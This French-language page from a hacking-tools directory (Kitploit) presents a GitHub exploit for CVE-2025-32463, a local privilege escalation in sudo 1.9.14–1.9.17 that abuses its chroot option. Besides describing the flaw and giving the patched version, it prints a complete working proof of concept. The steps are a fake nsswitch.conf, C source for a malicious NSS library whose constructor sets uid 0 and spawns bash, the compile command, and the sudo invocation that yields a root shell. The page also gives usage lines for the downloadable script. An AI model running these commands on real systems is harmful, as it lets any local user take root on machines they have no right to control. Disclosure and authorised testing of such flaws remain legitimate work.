Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32463_exploit — Exploit d'élévation de privilèges locale pour sudo 1.9.14-1.9.17 qui abuse de la gestion chroot de CVE-2025-32463, en injectant un constructeur de bibliothèque NSS malveillant pour lancer un shell root pour tout utilisateur local. | Kitploit
Outils/GitHubGitHub/0xdak/cve-2025-32463_exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationDéveloppement de Charges Utiles
GitHub0xdak/cve-2025-32463_exploit

CVE-2025-32463_exploit

Exploit d'élévation de privilèges locale pour sudo 1.9.14-1.9.17 qui abuse de la gestion chroot de CVE-2025-32463, en injectant un constructeur de bibliothèque NSS malveillant pour lancer un shell root pour tout utilisateur local.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 17 joursPas encore vérifié

CVE-2025-32463 — sudo « chwoot » chroot Élévation locale de privilèges

Élévation locale de privilèges à root dans sudo via l'option --chroot (-R). Fonctionne pour n'importe quel utilisateur local, y compris les comptes sans aucune entrée sudoers (par ex. www-data).

sudo 1.9.14 – 1.9.17 exécute un chroot() dans le répertoire fourni par l'utilisateur pendant que la politique sudoers est encore en cours d'évaluation — c'est-à-dire avant la décision d'autorisation. Après ce chroot(), les recherches NSS de sudo lisent /etc/nsswitch.conf depuis l'intérieur du chroot de l'attaquant, et glibc transforme un nom de source bidon en dlopen("libnss_<name>.so.2") — chargé et son constructeur exécuté en tant que root.

Placer un faux nsswitch.conf (passwd: /woot1337) ainsi qu'un libnss_/woot1337.so.2 malveillant dont le constructeur ELF exécute setreuid(0) + exec("/bin/bash") donne un shell root. L'exploit se déclenche avant la vérification sudoers, donc l'appelant n'a besoin d'aucun privilège sudo.

  • Affecté : sudo 1.9.14 – 1.9.17
  • Corrigé : 1.9.17p1 (la modification du chroot en 1.9.14 a été annulée ; la fonctionnalité a été dépréciée)
  • CWE : 829 (Inclusion de fonctionnalités depuis une sphère de contrôle non fiable)
  • Impact : tout utilisateur local → root. Bug logique déterministe (pas de corruption mémoire, pas de force brute).
  • Divulgué par Rich Mirch (Stratascale), 2025.

Prérequis

Bibliothèque standard Python 3, un sudo setuid vulnérable (1.9.14–1.9.17), et gcc sur la cible (pour compiler le petit module libnss). À exécuter en tant qu'utilisateur à faibles privilèges.

Utilisation

root@kitploit:~
python3 exploit.py            # -> interactive root shell
python3 exploit.py -c 'id'    # run a single command as root

Comment ça marche

  1. Préparer un répertoire chroot avec etc/nsswitch.conf = passwd: /woot1337 (+ une copie de /etc/group).
  2. Compiler libnss_/woot1337.so.2 — un ELF dont le constructeur (__attribute__((constructor))) fait setreuid(0,0) et execl("/bin/bash", …).
  3. sudo -R woot woot — sudo fait un chroot dans woot, résout NSS, fait un dlopen de libnss_/woot1337.so.2 en tant que root, et le constructeur donne un shell root — avant même que sudo ne vérifie si l'utilisateur est autorisé.

PoC manuel canonique (Stratascale / pr0v3rbs "chwoot") :

root@kitploit:~
cd $(mktemp -d); mkdir -p woot/etc libnss_
echo 'passwd: /woot1337' > woot/etc/nsswitch.conf; cp /etc/group woot/etc
cat > w.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void){setreuid(0,0);setregid(0,0);chdir("/");execl("/bin/bash","/bin/bash","-p",NULL);}
EOF
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 w.c
sudo -R woot woot        # -> root

Vérifier une cible

root@kitploit:~
sudo --version | head -1   # "Sudo version 1.9.14" .. "1.9.17" => vulnerable ; 1.9.17p1 => patched

Remédiation

Mettez à jour sudo vers ≥ 1.9.17p1. La fonctionnalité chroot est dépréciée et ne doit pas être utilisée comme mécanisme de confiance.

Avertissement

Pour les tests de sécurité autorisés et l'éducation uniquement. Ne l'utilisez que contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil